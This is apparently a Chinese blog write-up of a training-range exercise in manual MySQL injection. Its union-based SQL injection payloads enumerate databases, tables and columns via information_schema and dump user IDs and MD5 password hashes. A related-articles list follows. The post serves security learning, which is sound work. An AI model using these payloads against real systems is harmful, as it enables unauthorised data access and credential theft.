MySQL手工注入(墨者-入门)

最新推荐文章于 2024-08-18 15:09:09 发布
最新推荐文章于 2024-08-18 15:09:09 发布
阅读量74 收藏
点赞数
分类专栏: 墨者靶场随笔 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63082823/article/details/132396788
版权

前几天完成的一个MySQL手工注入靶场,今天练起来居然觉得懵懵的,想着还是记录下来吧以后也方便找出来看

信息收集

  • 猜解列名数量(字段数):order by x(看x为几时页面会出错)
  • 报错猜解准备:用union select 1,2,3,……判断具体哪个字段会有回显
  • 根据查询到数据库——表名——列名——数据来找想要的数据
  • 查询数据库:version()
  • 数据库名字:database()
  • 数据库用户:user()
  • 操作系统:@@version_compile_os
  • information_schema.tables 记录所有表名信息的表
  • information_schema.columns 记录所有列名信息的表

我们的目的是找到用户名和密码,为此得根据mysql的特性一级一级向下找。

ONE

order by 猜解字段数

在这里插入图片描述

TWO

  • union select 猜解回显字段,然后令id为假爆出当前数据库——database()

在这里插入图片描述

  • 若想查看所有数据库,用group_concat函数查看所有分组(mysql5.0版本以上有information_schema.schemata存有所有数据库名)
union select 1,2,group_concat(schema_name),4 from information_schema.schemata

在这里插入图片描述

Three

爆出当前数据库下的所有表名

union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

where table_schema='mozhe_Discuz_StormGroup'或者where table_schema=databese()——指定当前数据库table_schema
在这里插入图片描述

Four

爆出StormGroup_member下的列名

union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member'

where table_name='StormGroup_member'——指定表名table_name
在这里插入图片描述

Five

爆出字段值
那既然我们找到了id和password在StormGroup_member这张表里,那么就可以直接爆出字段值了

union select 1,group_concat(id),group_concat(password),4 from StormGroup_member

这里直接from+表名就可以了。
在这里插入图片描述
这是MD5密文,之后用工具解码就可以得到密码啦~

小注:

  • URL编码:当我们输入空格或引号到URL时会自动转换成URL编码,如空格是%20,单引号是%27。
  • 若爆破失败,可能是sql语句中含有LIMIT 0,1,这时候要用 “-- +”注释掉“LIMIT 0,1”(-- 是mysql的注释符号,+是url编码中代替空格的),有时候也可以#替代。
  • 注意注入语句的字符闭合。

有问题再提出我们一起进步鸭😘~

请君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 673
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
墨者靶场 入门:SQL手工注入漏洞测试(MySQL数据库)
qq_43233085的博客
01-10 1261
入门:SQL手工注入漏洞测试(MySQL数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解MySQL的数据结构; 4.了解字符串的MD5加解...
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1164
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者
weoptions的博客
12-01 1784
———靶场专栏———分享我的解题过程
墨者学院】SQL手工注入漏洞测试(MySQL数据库)
muyuchen110的博客
07-22 424
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者学院入门手工注入
Zichel77的博客
06-21 294
关于SQL注入 SQL注入是一种注入攻击,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。 攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来...
墨者学院——入门SQL手工注入
Zichel77的博客
05-26 1328
关于SQL注入 SQL注入是一种注入攻击,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。 攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授权访问...
手工注入和BurpSuite入门-web安全
gaogzhen的博客
08-10 1118
1、手工注入 具体的手工注入步骤可以参考之前写的博文:SQL注入基础步骤及SQLMap工具使用(一) 这里我们以墨者学院->在线靶场->web安全->SQL注入->SQL手工注入漏洞测试(MySQL数据库)为例,重新复习一下,重点是: 查询注入注入步骤 启动靶场,图示: 分析: 登录用于输入账号密码可能出现的漏洞为弱密码口令 当鼠标放在下面灰色横条时,出现通知提示,切可点击,有可疑,点击进入 进入后,图示: 按照通常的注入步骤一步一步来: 判断是否存在注入,并寻找注入
oracle手工报错注入,注入
weixin_34515601的博客
04-10 452
Spring的常用注解2021-01-21 13:03:49① @Component:使用在普通java类上② @Service:使用在业务层类上作用:声明一个类的对象为bean对象,相当于配置了bean标签。注意:相当于使用的是无参数构造器来创建对象。问题:只使用@Service注解,和 A a=new A();的效果是相同的,创建的是一个没有初始化数据的bean对象,但是在sqlmap2021...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
MySQL中处理JSON数据:大数据分析的新方向
最新发布
Chujun123528的博客
08-18 769
灵活性:JSON数据类型允许你在单个列中存储复杂的数据结构,如数组和嵌套对象,这减少了需要创建多个表来存储相关信息的必要性。查询能力:MySQL为JSON数据类型提供了一系列内置的函数,如, , , , , 等,使得查询和修改JSON数据变得非常便捷。索引支持:MySQL支持为JSON文档中的特定路径创建虚拟列(Generated Columns),然后可以在这些虚拟列上创建索引,从而加速基于JSON内容的查询。性能优化:随着MySQL的不断改进,对JSON数据的处理性能也在不断提高。虽然与专门的NoSQL
MySQL的初步认识
2301_80706853的博客
08-14 330
MySQL的初步认识
MySQL源码安装与MySQL基础学习
2401_84618124的博客
08-15 266
​ 本次安装使用的是绿色硬盘版本,无需额外安装依赖环境,比较简单。:条件的筛选,可以跟多个条件,可用and或or连接,:表示0个或多个字符。:修改表名和修改表结构。
浅谈SQL Server、Oracle和MySQL
a876106354的博客
08-15 742
SQL Server 是Microsoft公司推出的关系型数据库管理系统。具有使用方便可伸缩性好与相关软件集成程度高等优点,可跨越从运行MicrosoftWindows 98的膝上型电脑到运行2012 的大型多处理器的服务器等多种平台使用。Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能(BI)工具提供了企业级的数据管理。数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。MySQL是一个。
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值